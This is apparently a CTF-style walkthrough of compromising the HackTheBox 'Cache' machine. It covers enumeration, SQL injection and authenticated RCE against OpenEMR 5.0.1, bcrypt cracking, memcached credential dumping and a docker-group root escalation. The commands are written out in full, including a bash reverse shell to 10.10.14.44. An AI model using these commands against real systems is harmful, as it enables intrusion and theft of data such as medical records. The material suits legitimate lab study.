Cache HackTheBox Walkthrough

This is Cache HackTheBox Walkthrough. In this walkthrough I will demonstrate step by step procedure how I rooted to Cache HackTheBox machine. Cache is a Linux machine with IP address 10.10.10.188 and is given difficulty level medium by its maker. Let’s begin. Connect your machine with VPN and confirm by pinging the IP 10.10.10.188.

I started by scanning the IP 10.10.10.188 so that I could get some starting point to proceed. Nmap [a popular port scanner] gave the following result.

Scanning

$nmap -sV -sC -oA scan 10.10.10.188

Nmap revealed that ports 22, 80, and 30000 are open and SSH, Apache Web Server, and Memcached [a general purpose distributed memory-caching system] services are running over them respectively. After going to URL http://10.10.10.188/author.html found a name ash. Added it to my notes as it may be a user of the box. Nothing interesting found so tried to directory brute force.

Directory brute forcing

$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

Directory brute forcing revealed two folders javascript and jquery.

Access to http://10.10.10.188/javascript/ gives access denied

And http://10.10.10.188/jquery/functionality.js revealed

From above file got the credential ash: H@v3_fun

Used the credential at URL http://10.10.10.188/login.html. After login got nothing interesting except an image of magician

Tried to create custom wordlist using cewl.

Custom Wordlist Create

$cewl -w custom_wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html

Tried to WFUZZ for domain names with the custom wordlist which we have created.

Fuzzing For domain

$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Got 302 response at word HMS. Added hms.htb to my /etc/hosts file in case if there is Virtual Hosting enabled we can get something more to enumerate.

Hosts file before modification

Hosts file after modification

Ongoing to http://hms.htb found that it is running OpenEMR software [a medical practice management software which also supports Electronic Medical Record] is running and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. Tried to login with default credential admin: pass, but could not login.

Tip: During CTF hunting and penetration testing whenever you get any popular software or web app always try to login with default credential because sometimes administrator forget to change its default credentials.

As I found any known software then my next step is to find its version so that I could get information about public exploit. After a lot of enumeration couldn’t get its version. At the footer of the login page at http://hms.htb/interface/login/login.php?site=default got copyright information is outdated.

So I am guessing that this software was last updated in 2018. And public exploit before 2018 may work on it. After seeing the release history it appears that the current version is 5.0.1 or less than this.

As soon as I get the software name and its version my next step is to find the available public exploit.

Searching Public Exploit

$searchsploit openemr 5.0.1

Searchsploit gives there is an authenticated RCE. So, we require Username and Password of the openEMR software to get Remote Code Execution. After some googling got this file on openEMR website https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf which reveals that OpenEMR 5.0.1 has multiple vulnerability. And SQL Injection was among them.

According to pdf file there is a GET based SQL injection vulnerability at URL http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend you to read the pdf file to know more.

Dump username and password

Capture request in file named request.txt using burp suite

$sqlmap -r request.txt --dbs --batch

$sqlmap -r request.txt -D openemr --tables

$sqlmap -r request.txt -D openemr -T users_secure --dump

Got the credential

openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

from the database openemr. After identifying the hash got that it is bcrypt hash.

Cracked the hash using Debycrypt tool.

$git clone https://github.com/BREAKTEAM/Debcrypt.git

$cd Debcrypt/

$python3 crack.py

HASH: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B

So the Credential is openemr_admin: xxxxxx [six times small x]

Tip: Always try to use tool which is assigned for dedicated work rather than using those tool which is for many number of operations. This will increase the efficiency and accuracy. For example to crack bcrypt hash I have used Debcrypt, a tool to crack bcrypt hash rather than using Hashcat or JohnTheRipper

Since we already know that there is an authenticated RCE exploit exists for openemr software. Let’s use it by mirroring it on our PC from exploit-db database.

Mirror exploit

$searchsploit openemr 5.0.1

$searchsploit -m exploits/php/webapps/45161.py

$mv 45161.py openemr_rce.py

Getting Shell

$nc -nvlp 1234 // In separate window

$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'

Upgrade the shell to fully qualified Linux Shell

Shell Upgrade

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm-256color

Got two users ash and luffy inside /home/ directory. Easily switched to user ash using $su ash. Enter the creds which we have captured from http://10.10.10.188/jquery/functionality.js file i.e., H@v3_fun

$su ash

Password: H@v3_fun

Grab User Flag

$cat /home/ash/user.txt

PRIVILEGE ESCALATION

Tried to run $sudo -l to check if ash has any special permission, but got error because user ash is not configured inside sudoers file.

linpeas.sh [a post exploitation enumeration script] revealed that user luffy is the part of docker group.

After googling docker privilege escalation found this and this interesting articles. But the problem is this that docker can only be run by user luffy because luffy is part of docker group. And we can’t switch to luffy using $su luffy because we don’t have it’s credential. So we need the password of luffy. Wait, we have memcached server running on port 30000.

After googling Penetration testing on memcached server found this article . Followed the steps as discussed in the article and got the credentials of luffy. Remember all these steps are needed to be done on remote cache machine.

$netstat -alnop revealed that memcached server is listening on port 11211 locally. So we have to connect to it using telnet to get some information.

$telnet 127.0.0.1 11211

~version

~stats

~stats slab

~stats items

~stats cachedump 1 0

~get user

~get passwd

So the credential is luffy: 0n3_p1ec3. Exit from the telnet and switched the user to luffy.

$su luffy

Password: 0n3_p1ec3

Getting Root

Lastly run

$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

to get root.

Capture Root Flag

$cat /root/root.txt

This is how I rooted to the cache machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Having any issue feel free to comment us. Want to give any suggestion please write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com